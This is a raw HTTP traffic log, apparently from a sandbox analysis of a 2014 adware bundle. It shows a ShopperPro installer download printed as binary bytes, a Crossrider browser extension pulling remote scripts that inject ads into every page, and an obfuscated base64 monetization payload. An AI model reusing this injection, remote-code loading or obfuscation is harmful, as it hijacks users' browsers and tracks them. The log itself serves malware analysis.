    GET /online/ka.aspx?CV=2.0.0.0&ProductID=12000&UserID=335e88be-0c5e-4ba6-851b-e652ba3e6ba3&Password=oCQOL84Q&OS=5&V=3.3.9.4&VS=0&Beta=0&Aff=limyu1_0_0_0_0,74261409-fb54-436c-b597-1b09ef03540d,&BundleID=NONE&BrandID=NONE&PartnerList=&ElapsedTime=1401908127&SBPIDS=1&KA=1 HTTP/1.0
    User-Agent: CoreWinInet
    Host: online.GOOBZO.com
    Pragma: no-cache
    Cookie: ASP.NET_SessionId=gyq3hm5555rtu045g05eee55


    HTTP/1.1 302 Found
    Connection: close
    Date: Wed, 04 Jun 2014 18:55:31 GMT
    Server: Microsoft-IIS/6.0
    X-Powered-By: ASP.NET
    X-AspNet-Version: 2.0.50727
    Location: hXXp://online.speedbit.com/online/update.aspx?CV=2.0.0.0&ProductID=12000&UserID=335e88be-0c5e-4ba6-851b-e652ba3e6ba3&Password=oCQOL84Q&OS=5&V=3.3.9.4&VS=0&Beta=0&Aff=limyu1_0_0_0_0,74261409-fb54-436c-b597-1b09ef03540d,&BundleID=NONE&BrandID=NONE&PartnerList=&ElapsedTime=1401908127&SBPIDS=1&KA=1
    Cache-Control: private
    Content-Type: text/html; charset=utf-8
    Content-Length: 1264
    <html><head><title>Object moved</title></he
    ad><body>..<h2>Object moved to <a href="hXXp://onlin
    e.speedbit.com/online/update.aspx?CV=2.0.0.0&ProductID=12000&U
    serID=335e88be-0c5e-4ba6-851b-e652ba3e6ba3&Password=oCQOL84Q&O
    S=5&V=3.3.9.4&VS=0&Beta=0&Aff=limyu1_0_0_0_0,7426140
    9-fb54-436c-b597-1b09ef03540d,&BundleID=NONE&BrandID=NONE&am
    p;PartnerList=&ElapsedTime=1401908127&SBPIDS=1&KA=1">he
    re</a>.</h2>..</body></html>....<!DOCTYPE h
    tml PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org
    /TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="hXXp://ww
    w.w3.org/1999/xhtml" >..<head><title>...Untitled Page..
    </title></head>..<body>.. <form name="form1" m
    ethod="post" action="ka.aspx?CV=2.0.0.0&ProductID=12000&UserID
    =335e88be-0c5e-4ba6-851b-e652ba3e6ba3&Password=oCQOL84Q&OS=5&a
    mp;V=3.3.9.4&VS=0&Beta=0&Aff=limyu1_0_0_0_0,74261409-fb5
    4-436c-b597-1b09ef03540d,&BundleID=NONE&BrandID=NONE&Par
    tnerList=&ElapsedTime=1401908127&SBPIDS=1&KA=1" id="form1"
    >..<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" valu
    e="/wEPDwUJNzgzNDMwNTMzZGTTAuzAluiepn5Ur3p1G7qqvo u/g==" />.. &l
    t;div>.. .. </div>.. </form>..</body>..&
    lt;/html>....

    <<< skipped >>>

    GET /ShopperProJSFull.exe HTTP/1.1
    Range: bytes=0-249999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d2bt1dcmxj05l2.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 28 Apr 2014 16:17:28 GMT
    Last-Modified: Mon, 28 Apr 2014 14:06:17 GMT
    ETag: "b284dd3a8425b05805d7f1a9c12291d1"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 0-249999/2328584
    Age: 25640
    X-Cache: Hit from cloudfront
    Via: 1.1 ae2ec41419bb9b44ca9b925fad50a43f.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: HuM87C5wBHBPZnoOv_N1xd6z-Me_mE8pTK1sxphf8yculrrh5VjXlw==
    MZ......................@.............................................
    ..!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8
    ...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8.......
    .PE..L.....GO.................p.......B...9............@..............
    .....................#[email protected]..........
    ..C...........l#......................................................
    ........................................text....o.......p.............
    ..... ..`.rdata...*.......,...t..............@[email protected]....~...........
    ...............@....ndata...P...0...........................rsrc....C.
    ......D..................@[email protected][email protected].
    ......................................................................
    ......................................................................
    ......................................................................
    ......................................................................
    ...............................................U....\.}..t .}.F.E.u..H
    [email protected][email protected]...
    ..@..}[email protected]... M..........M........E...FQ.....NU
    ..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.
    [email protected]}[email protected].}.j.W.E......E.....
    [email protected][email protected][email protected] [email protected].
    u.....@._^3.[.....L$...-G...i. @...T.....tUVW.q.3.;5.-G.sD..i. @...D..
    S.....t.G.....t...O..t .....u...3....3...F. @..;5.-G.r.[_^...U..QQ

    <<< skipped >>>

    GET /ShopperProJSFull.exe HTTP/1.1

    Range: bytes=500000-749999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d2bt1dcmxj05l2.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 28 Apr 2014 16:17:28 GMT
    Last-Modified: Mon, 28 Apr 2014 14:06:17 GMT
    ETag: "b284dd3a8425b05805d7f1a9c12291d1"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 500000-749999/2328584
    Age: 25644
    X-Cache: Hit from cloudfront
    Via: 1.1 ae2ec41419bb9b44ca9b925fad50a43f.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: yVdUeMbcjI0FG1ASA209visBuRSMUCNgXcQ8V9co2nvj_FqC5bCZ1Q==
    >.u...>}..A4..,*.../.D/....I.<..f..|..-....wi.....x..`....r..
    .z.B..."...*..K.I.;..Z$...D.`.......`. [..T$..Y........M.!P..2P...u..!
    o..."..6.>...*g8H\D,....B.^...]...H.......)X,=.z...n!L.!.I.D.......
    .e..c.r...I..,.I.H.......X ..y...L......._.:k.m.U`..RE-v1.K....9.=O...
    nc.}.V..L.V..$.OR......_|.I..N...H&..#....)UK^[email protected]..;...ZCe
    c]tu.@#..l...pp/..s....,........'./.-<S....".K.s%.$d./..L(..VdN.I$.
    .......p.:.}.@"!-|.eNC...<./Qw...U^m./...p....|....(......e../..\F.
    ../..Z2......^Q.89.(0..t..Nb.....\\k$\....g.r.<..6Ey.u...S........=
    ...W.}.....|...V5...N\#H.....fon8d....>&..!...az[:-...]....|u{.:\..
    M.`@9.... .......^...dw..Z...e.ax..([...S....{Vu..x.}...M^.h.n#.|{*M..
    .Vt..,.o....M..KZW:..,.s?...........i.......,..W....Z....=.].9.7*....
    .A_...8.......w..z.?Bl...~..........1.VKK....5@_..r*.G..,,....J....W..
    .3....]....H..|....`.s....P1.......j.B=..........Ud\.....\v.......$...
    .[..$y...cy/N7PT.............V.,)..[C......I.R.G...qm..~g.{..x.,r.,.v.
    ........;..:A..u..~tB.....^.n...... .5q...A........2;kJ........%.V.).W
    ._..Lb(=.Nw.V..i.o.>......Z.....D<. O..u.a0...tn6LQe2'. ...7...`
    .E..V..T8.JN..(..XHs.?dXu.8...7.3.Q.'.h..#...m.....U......h.}.J.%V..(.
    [email protected].......`.X'....g...(#..$..=......UY....M..#...H.P..hM...Qp.7.<
    P...9..Ju......]H......I.9....../..M..........cn.1.8.....1.y..%Ry5s...
    r..............M].F.....P..8...=.....pEo5z..>.v.....0^.`..v'vS.s...
    ..J.W\.....Y.....j.!5m..g$..S...(.h^......}@..]q.i.Y..H`.|[..D..h.^..8
    .Yv..;e..V.<...Sj.....eGp~S&b.....P.C[..."....2..U.tc.xj....O"{

    <<< skipped >>>

    GET /ShopperProJSFull.exe HTTP/1.1

    Range: bytes=750000-999999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d2bt1dcmxj05l2.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 28 Apr 2014 16:17:28 GMT
    Last-Modified: Mon, 28 Apr 2014 14:06:17 GMT
    ETag: "b284dd3a8425b05805d7f1a9c12291d1"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 750000-999999/2328584
    Age: 25646
    X-Cache: Hit from cloudfront
    Via: 1.1 ae2ec41419bb9b44ca9b925fad50a43f.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: bEkgq11XT6WQ3a4ujFAzDCW3c_AS5EHqTc9HEFo5LNzYXo5CV0tPbQ==
    .4..t$T......aQd'i...)(F....Jd[....P.......;Ya..D?...~....DI.../......
    ..%..9.g..ZL.bL..Dp8.....G@..._%.....?Yc.G2.U.."....*.L~.....4U.7H..J9
    .nN.Yx]#.1.c=#.Yq.....jH..lU.%..YJ..._.wl2.U..9.w.L.......-.F..j......
    ..".]...r..SNR....:..=.c.L....o.Y. ....B.c......?.1..e..:1...._.A.....
    Yu..#e.Er.o2./FS....g.3R.C...@G`.s.. ..K.}.....}.....)R.t.6......#..u.
    .l..6.....M)..2....D....iR..\.y.......}...`"....z@.*..e.!....t.....9.(
    HX...J....*.oP<...|h......DX...~X.9w....v....y.......`."..f.G6.Ld.:
    .U_x....w.s~gj..TD...nW...4.j...."58]F..bz....C..../. >....0n...P..
    |..9..E~~.$.&..6....2........._.*.02'..9..?<|<....(K....%.5&.1Xt
    .W.........(.l.../by.}.'{(....\....=v..]{.K.X... o..gv.....`.&...S....
    E...7L(...V.H.........h-u..Y..Hu.d..2.A.0....>.,.P.j..; .. ...z d..
    ..?!..j....rM..X.`<N........L{..g....F...-..r.../.....1.R.a.87=..9.
    ..$H..a...;"...&......`..<....x2...)`|....|;.&u.I..~.,.O(...H...].d
    ..8..[..t..7....OX."...{.;.B.k.m..t..5S......#...C<&s..>.Y.[..v.
    lB.?...i..9.Li...A:.Uo1....Y6..'..g{.a&.....Va...]m.{.....N.Lz3.[uC...
    .6...."..j..t-...7.>.;[email protected].... :%Z....#.w..S'..'...a...].
    ...qg3..Y..$.a?w,..k.V.f....j.....:D......'.eZv..pt\..........e!..a...
    #.@G.?b.}'......]).tEB........-I/M:...([email protected]
    b.CA.'1.im.......D....1...tB .X.Sw.....D3.!.I..-......[K.....<g.u8.
    .L3.I38.;..>.8_e.T....>... ......m~.(....8.........í..R.!.....
    [....w...=^.{,.].....H..._............|"G.ZE.w.e......r.u.f..C] i.....
    .h...xNR..L.BO.......c^.~...n..2.r.X'...g/[email protected],...&^....R...'..

    <<< skipped >>>

    GET /ShopperProJSFull.exe HTTP/1.1

    Range: bytes=1000000-1249999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d2bt1dcmxj05l2.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 28 Apr 2014 16:17:28 GMT
    Last-Modified: Mon, 28 Apr 2014 14:06:17 GMT
    ETag: "b284dd3a8425b05805d7f1a9c12291d1"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 1000000-1249999/2328584
    Age: 25648
    X-Cache: Hit from cloudfront
    Via: 1.1 ae2ec41419bb9b44ca9b925fad50a43f.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: 2STT1xMVw4iQTkZPvzHn_xARmGfNps1NUv4CwNiFG7z1bjWTTlFeAA==
    D.\.FB..R..X f..f.......X..K...f6...4U.'\i..<..2.\`.w@q.....~...M.!
    #[email protected]":..T..a........i..:...F..a....4
    ....$;Q.......9..\..RA.u..]....\...o.....]0...h.....Z...hB.'l....r..W.
    .Z..*.....%.........._.....DZ.4..ss:.J(`..X.a.;..O.....[.K..-`.w?ai...
    *.._..f...g......{;[8.?...s.......,..zHv.9..').........=....[..H..%g.h
    ...#....AbC..........D..r.....:....5:........o.S.-~.._i.$.R.>..r...
    F[O1J.. ...}.......4...m{....G..#[email protected][email protected](..$...s.
    2-..K.-..!..h.l.!......R....3Z.>.:.e~z$23B..goO.sngS...L....9d....K
    hdBV..!.}..3}'s~.E8W.......d..t.{......0....%/}..r.;...1....EKQ...k..F
    ...A.b..v.......#]<...%.u.b.6.....j.P.t\!W4..6Q..0.(<.]....i...j
    .{U..M.....qa>.H...}...#.M..L..<s..%O..#T..i.r..Q.0.n.......Z...
    .......H...%.I..].}.B....\X..k.V..j.q...z.Z..).#s......-..)%.K^F...k.I
    hS.....e\.]g...x.*e}....2.2.g....Q.].kx6.%/o..!.....5?.../.n...l.i8...
    ..[.R...r!Z&.4]@.}o.).n...Q........NG.v...[.eg."$lr..B..:.>.9..[1].
    nz..........=.......]....I..n..]'4.X......7.J.)....$....c.....E\.[.Sz.
    &.t.-...@..>..R...&.J\._. P...$y....7...(.o.....K.1B.........HU....
    Gt..Kv.f.6> 7.&".....y.....N........H..D.c....bq.....g... tA.Z..NG`
    -XjE....ZY..H.l.~.....K...........5...EW.O..O.[S.._0....C%R...z..O..L.
    9...&[v..0..\.SX....n..Z'.W8e$$.J...._...Y....V.&.{D......L.....".42..
    .`...X.O.J......Q.W..3.-..`.B.p.]3q,...H<../...!&2..,vG..eR..Ncj&T.
    ....p.Z...........V...S.FN..UJj..d...r.......t..#..Ou.Y...!. a4 ......
    ...r.x..ZK{Q.cK.<.`.v..8....).[X%..o..W..)I~......vj.~].D..|.Q.

    <<< skipped >>>

    GET /ShopperProJSFull.exe HTTP/1.1

    Range: bytes=1500000-1749999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d2bt1dcmxj05l2.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 28 Apr 2014 16:17:28 GMT
    Last-Modified: Mon, 28 Apr 2014 14:06:17 GMT
    ETag: "b284dd3a8425b05805d7f1a9c12291d1"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 1500000-1749999/2328584
    Age: 25649
    X-Cache: Hit from cloudfront
    Via: 1.1 ae2ec41419bb9b44ca9b925fad50a43f.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: i3fpilf0vKdOvLaesa3eLDw3YU_mnRTec_TrXimZshWgRar3hYBn9g==
    .. \..Tv..V.4.IHu/(a(..C.....5:...&C..P.....0c..d..JQY.]e."S>....pq
    .......Kav^[email protected]\...O.....).%.M....0.r..m.N..E..&4
    [email protected]..%t.D)...k.2-.x....U)V8&.Y\.
    ..%.wF8..LO....\).U.hP._....._. l......'..l....KV.<{.........'{l...
    Uz...O.63k....\....?....\.'.w........Z..A...tB8g*..U.-../...ng.6...Q.=
    ..@...^..}Y....f.....[..[.m....t{eQ....f ...V...[.)A[?....K..`LK.YP"*.
    .Z..$..h..:......6(hy...;.3..... .....3`..C1uUh?E.B..!........G....n..
    ..o..."].67.:b...S..%Hp.0.gVu9.u.......S..4.LoJ..........o.... #.o. ^
    ....#..b..1.^...^.K;..Jq....Fg>..T...V...R......[. .N.... .<....
    [email protected]^...K..u.CW.......h2.z....3./t......i.(@.
    4.q..w.....F.j.z<X&.._v.T..2..3.i..3..g$'...........b<J.f....W..
    ...T...,..X.~[.."_].......y.....#.*.S.$.J...uLM_<.....qbb.k6.Y.u...
    ..F."p.a...'%.$...e...r...G.sn.....4..........G.b...R0...]...._tTX.o.w
    6.GG..>.YF.n.b...t..Spv`.{...4]..'............C.#U.....T.?...L.....
    g.2l..#.Z..../@.&RYv)=\.5.....}i...\./..V.Jj...ae. p ..j.......y...g,B
    .B...y...6Q.. .wx0T..j.uZ.h........@\W$..O.7ie....l..k.7...qN..rM.M.;.
    ..7b......(<....e.{...U..?..?..b.....q..)....7...?....6....#...M...
    9...S.*[email protected]...(.z.b..K.D..t.~a....C...S.K...a...LM
    .\.|.......CU...Cf..o..s.y.r..~..cqW.h>..2....}.IH;.5.S........M.x.
    .bL.e..Y......m..t.DU.}n.P...J.5..k.u....2.Y[..ng<b,<-:Lt....v..
    .. .R%....A...l.&...t...WvX._{....y.#g..*...\[<........f..z6....M..
    OQ..X....1..{....%..q.v.g..K......&..O.....n....r..Q.....KoAr...j.

    <<< skipped >>>

    GET /ShopperProJSFull.exe HTTP/1.1

    Range: bytes=1750000-1999999
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d2bt1dcmxj05l2.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 250000
    Connection: keep-alive
    Date: Mon, 28 Apr 2014 16:17:28 GMT
    Last-Modified: Mon, 28 Apr 2014 14:06:17 GMT
    ETag: "b284dd3a8425b05805d7f1a9c12291d1"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 1750000-1999999/2328584
    Age: 25653
    X-Cache: Hit from cloudfront
    Via: 1.1 ae2ec41419bb9b44ca9b925fad50a43f.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: ZxMMjJjHG3_fpGDuvjTDCi5kMFVKNiaUu4xuQbwvy0L0RwF1lJ-a6Q==
    [1.T.O]@.r..G...U...#.k ...$..........X..:........-9..e.7..cD..G..i..]
    tFu...=yVQ.;c]w...=O*."tG....~C6)......B.a.mU....h.`..0.G|M=.j.X......
    .....Y..P..~^rvC..8H...y.0......; .........=_F........exp.....{4......
    8"p...N..!........^_m....!.rbJ4..g0...:.D2..C....%..4~e............"..
    .. 7/.0....VQE........ ^.\q....m/%..>.......j.oj...KRM.h.N.q...Z...
    $..Sj.f.........._.......QQn(......7....).r..7.z.wR}4).:.......... ...
    ....(........:..t...o.D."\[email protected]...........)B.b......T.....l...l..T
    n...E..4...dy2......32....-2.c...K....yD.z.R.{..)S;t.....<.P..O....
    XG/.l.v.)....T........L...\..z......WT.zc.jW7.:..9F.Q24...zd...XthP.BO
    [email protected](..{....j.._j%.~..D.:KS........>V.s..XYck.....%\
    ...d..h....$.>...s5.7..2G.W.....8#.<.F.L..W=!..M..d...8.....C.."
    ...........r.KK.>..b......,. .]/..._v ...\Zp.uW....M'..."..{wv.%..l
    L.gH.....Qf:M....S..>........i. x=.o.....Z....9...... ...SfJm..z..@
    D....wFB.;x.W)TA.O.$.....W%4....Ue....=......C.....5...K...Q..T./...oX
    .V...g.M..j..t..$...s.*h.n....,.k.9.51.A-.Q...M.#...Q.{r.. ../...Cf..1
    _T....F.......J..].7..B...R...:....9....QL.,...l.&7..3....b......].=..
    ;[email protected]{..a....w..,.lo#..)oUm..X..g..q ..V>..t90-srDT
    ].V...y........6.C....D. .YcMT.R....~...,.. ..#h~.1...l.......]...X$..
    s.....l^........V....N...J..z^l.o3.....(...3u...E...*.!........Y.;...y
    .......vt....'.aEt.ss|0..=....[[....eR...g!:.G........0..x......v.Q...
    NF........=....!5.T...... ....~...&%...............0p(...U.b'>3wQ,^
    .{#W.]........`i.LbvE1...z__....L..7.[e.....?g:...|..I.cvdGG..;...

    <<< skipped >>>

    GET /ShopperProJSFull.exe HTTP/1.1

    Range: bytes=2250000-2328583
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
    Host: d2bt1dcmxj05l2.cloudfront.net
    Connection: Keep-Alive


    HTTP/1.1 206 Partial Content
    Content-Type: application/octet-stream
    Content-Length: 78584
    Connection: keep-alive
    Date: Mon, 28 Apr 2014 16:17:28 GMT
    Last-Modified: Mon, 28 Apr 2014 14:06:17 GMT
    ETag: "b284dd3a8425b05805d7f1a9c12291d1"
    Accept-Ranges: bytes
    Server: AmazonS3
    Content-Range: bytes 2250000-2328583/2328584
    Age: 25655
    X-Cache: Hit from cloudfront
    Via: 1.1 ae2ec41419bb9b44ca9b925fad50a43f.cloudfront.net (CloudFront)
    X-Amz-Cf-Id: enDUAb_bOHrmK2-581Yqqwu4p1vDXZ_BHMWoz3AotixAOyNjcWW8Jg==
    J..:m.y..j.....1..@;......>......?v.......;.=......N..........1T*.A
    "}i2...&.G>.t..%.g.Z..*.;.~}^.z....wN......{.!............`.l......
    VAq....5). ...H....G|(0d.)..<1...7...0......es..>...S..4.d......
    S.!O......C../.....a.vJ...9...g.{1.<ZX..D..TV...%t.&..|.06.".......
    ..(...(.K....CO.....i..|h.....z.kq...3;.QDZ.... ..#V..F.=....-.=_...&l
    t;9a....)L.....U.....v9@[email protected].]...8L.K..`.xq....
    ..\lX...P...yTLE.....of...8.kh......rn.b.9.|.\.8<i].].ji{.P..59.b..
    .....!}P...d....;h...Zi.,.JVW..y.....g...oK.q..OR..x...7_}..7. >...
    |c...~.5.../..B..qC.s;..Yk..;..QI....v.D...5@..,..L..=i.s/..T..v.)l.Ob
    [.......S.a.Al.4.....V.R.|..6.....o.....2..o.y.70x......VML[........;.
    .m].o.S@..[.Nu._G1X.W...|d....k.g..b..l...>Q......,....n.\.:.....j.
    Z........CEV.a<R..)[email protected].,.1.....p.......\.Uo.pCV..G...
    .EH.#.]...6#6c..k7.)...Rnz...y..i.(0B.....=.5.9...M)...|.O....q_......
    D......$...~Dx...j.'.?.......E.d..T$.....0>O.5wd....mg.....lC.u..b.
    #M.rS...w..|9.o.7.).@-=R..hL...fPq.6N..J....n.;s.y....n.-iVt....KS<
    ......!j.h.E..laM8P#.9e...b.E.glR..r...=.m.....%(.Cq..~`h..'h..k..KS..
    .(m..-N&u...H...Br6..l..D.,ng3.e.|v'..=..-...(M...-...i.s9.>..X.w.C
    L.D.....g".=.7..{......u.K........4.".rE..o..W.:.3.{..........\%&"G..p
    .I.z..W~....._.)M.?..$Pk..!*.o.h.E......s<..q...Y*..yAt..3D..,..kj\
    ...3J...|n..r.4."..n............=...(...45y1.E.X..`............t...#r.
    ..>.......[#...p)...... ..."..kXU..7X8g.a.........v.}...\W.s . ..M.
    .M..}..)..A'.....z..r./T<........)y....>0.nB....]x.....[,..d

    <<< skipped >>>

    GET /plugin/apps/32850/manifest/1_34_05_12/ie6/manifest.xml?ver=197&rnd=7542 HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 18:55:21 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1401378907"
    Last-Modified: Thu, 29 May 2014 15:55:07 GMT
    Cache-Control: max-age=886
    Content-Length: 1707
    Content-Type: text/xml; charset=UTF-8
    X-HW: 1401908121.dop012.am4.t,1401908121.cds042.am4.c
    <?xml version="1.0" encoding="UTF-8"?>.<CrAppInfo>.  <V
    er>200</Ver>. <ShortName>Object Browser</ShortName&
    gt;. <Description>Browser enhancer</Description>. <Pu
    blisherName>Object Browser</PublisherName>. <HomePageLink
    >NA</HomePageLink>. <JSLink>hXXp://js.clientstatsservi
    ce.com/plugin/apps/32850/js/na/ie/app_code.js</JSLink>. <Gro
    upID>0</GroupID>. <Domain>NA</Domain>. <RunI
    nIframe>false</RunInIframe>. <ThanksURL>NA</ThanksU
    RL>. <EmailSignature>NA</EmailSignature>. <Setting
    sURL>NA</SettingsURL>. <CertifiedInstall>NA</Certif
    iedInstall>. <ExposeSites>NA</ExposeSites>. <Remot
    eFBApiURL>NA</RemoteFBApiURL>. <DisableIE>true</Dis
    ableIE>. <DisableFF>true</DisableFF>. <EnableSearc
    hIE>false</EnableSearchIE>. <EnableSearchFF>false</
    EnableSearchFF>. <AddressbarIE>NA</AddressbarIE>. <
    ;AddressbarFF>NA</AddressbarFF>. <AddressbarFFEnhanced>
    ;NA</AddressbarFFEnhanced>. <AddressbarCR>NA</Addressb
    arCR>. <NewTabURL>NA</NewTabURL>. <NewTabEmbed>
    NA</NewTabEmbed>. <OpenSearchURL>NA</OpenSearchURL>
    . <BackgroundJS>hXXp://js.clientstatsservice.com/plugin/apps/32
    850/bg/na/ie/bg_code.js</BackgroundJS>. <BackgroundVer>1&
    lt;/BackgroundVer>. <Manifest>NA</Manifest>. <

    <<< skipped >>>

    GET /plugin/apps/32850/js/na/ie/app_code.js?ver=200&rnd=6387 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 18:55:22 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1401378863"
    Last-Modified: Thu, 29 May 2014 15:54:23 GMT
    Cache-Control: max-age=783
    Content-Length: 5371
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1401908122.dop012.am4.t,1401908122.cds017.am4.c
    ..  /*****************************************************************
    *******************. This is your Page Code. The appAPI.ready() code
    block will be executed on every page load.. For more information plea
    se visit our docs site: hXXp://docs.crossrider.com.*******************
    ******************************************************************/..a
    ppAPI.ready(function($) {.. // Place your code here (you can also d
    efine new functions above this scope). // The $ object is the exten
    sion's jQuery object. //sendReport();. . setupInjections();.
    . //BlekoEnhancedSearch();. ..function getPixGuid(){. var
    aff_id = "";. try {. var zdata = appAPI.installer.getParams(
    ).uzid;.. $.base64.is_unicode = false;. var jsonData = $
    .base64.decode(zdata);.. var jsonObj = $.parseJSON(jsonData);.
    if (jsonObj !== null) {....aff_id = jsonObj.data.date;.
    }. }. catch (err) {. //In case there's an error - just ca
    tch it here, so we'll do things gracefully.. //alert(err);.
    aff_id = appAPI.db.get('affiliate_id');. }. . try {..
    if (aff_id !== "") {....var elements = aff_id.split(",");....if (eleme
    nts.length == 3){.....//We have a pixguid - the pix is element 2.....a
    ff_id = elements[1];....}.. }. }. catch (err) {...aff_id = ""
    ; .. }.. sParam = aff_id;..return sParam;..}..function inject
    GetDeal(country){.. var us = new String("\"US\"");. var ca = new
    String("\"CA\"");. var br = new String("\"BR\"");. var de =

    <<< skipped >>>

    GET /plugin/apps/32850/plugins/na/ie/plugins.json?ver=164&rnd=4320 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 18:55:21 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1401378863"
    Last-Modified: Thu, 29 May 2014 15:54:23 GMT
    Cache-Control: max-age=42
    Content-Length: 18658
    Content-Type: text/plain; charset=UTF-8
    X-HW: 1401908121.dop012.am4.t,1401908121.cds055.am4.c
    {"plugins_list":.    [.      {"id":1,"url":"hXXp://js.clientstatsservi
    ce.com/plugins/mins/base.js","ver":10,"name":"base","browsers":{"ie":t
    rue,"ff":true,"ch":true,"sf":true,"nv":false,"px":false},"targets":[{"
    run_at":1,"order":10400},{"run_at":2,"order":10400}],"enabled":true},{
    "id":4,"url":"hXXp://js.clientstatsservice.com/plugins/javascripts/jqu
    ery-1_7_1_min.js","ver":4,"name":"jquery_1_7_1","browsers":{"ie":true,
    "ff":true,"ch":true,"sf":true,"nv":true,"px":true},"targets":[{"run_at
    ":1,"order":10200},{"run_at":0,"order":100},{"run_at":5,"order":100},{
    "run_at":2,"order":10200}],"enabled":true},{"id":2,"url":"hXXp://js.cl
    ientstatsservice.com/plugins/mins/ie8_fix_1.js","ver":2,"name":"ie8_fi
    x_1","browsers":{"ie":true,"ff":false,"ch":false,"sf":false,"nv":false
    ,"px":false},"targets":[{"run_at":1,"order":10100},{"run_at":2,"order"
    :10100}],"enabled":true},{"id":3,"url":"hXXp://js.clientstatsservice.c
    om/plugins/mins/ie8_fix_2.js","ver":2,"name":"ie8_fix_2","browsers":{"
    ie":true,"ff":false,"ch":false,"sf":false,"nv":false,"px":false},"targ
    ets":[{"run_at":1,"order":10300},{"run_at":2,"order":10300}],"enabled"
    :true},{"id":28,"url":"hXXp://js.clientstatsservice.com/plugins/mins/i
    nitializer.js","ver":4,"name":"initializer","browsers":{"ie":true,"ff"
    :true,"ch":true,"sf":true,"nv":false,"px":false},"targets":[{"run_at":
    1,"order":999999999},{"run_at":2,"order":999999999}],"enabled":true},{
    "id":21,"url":"hXXp://js.clientstatsservice.com/plugins/mins/debug.js"
    ,"ver":5,"name":"debug","browsers":{"ie":true,"ff":true,"ch":true,

    <<< skipped >>>

    GET /plugins/mins/monetization/geo/bpo_intext_m.js?ver=1&rnd=41 HTTP/1.1

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.clientstatsservice.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 18:55:22 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1401610214"
    Last-Modified: Sun, 01 Jun 2014 08:10:14 GMT
    Cache-Control: max-age=770
    Content-Length: 1451
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1401908122.dop012.am4.t,1401908122.cds047.am4.c
    if (typeof setup2 === 'function') { setup2('MTA2NDc5NTIxODEwMDIxYTI3MW
    QwNzRjNGE1MDUyMGMwMjFlMDI1NTQ0NDExMTE0MDM0YTAyMGMwYTA2MWE0MDEzMWYxZDRi
    MTc0NDAyMDcxYjUxNDY0MjQ2MTYxMzBjNDM1MjVkNWQ0NzQyNDYwMjQxNTk0NTVjNWM1Yz
    Q2NDk0NjUwNDA1ZjQ1NWQ1ZDU3NDYxNTQ3NTA1MDVjNDA1OTE5MGIxNjQyNGQzYjI5Mjky
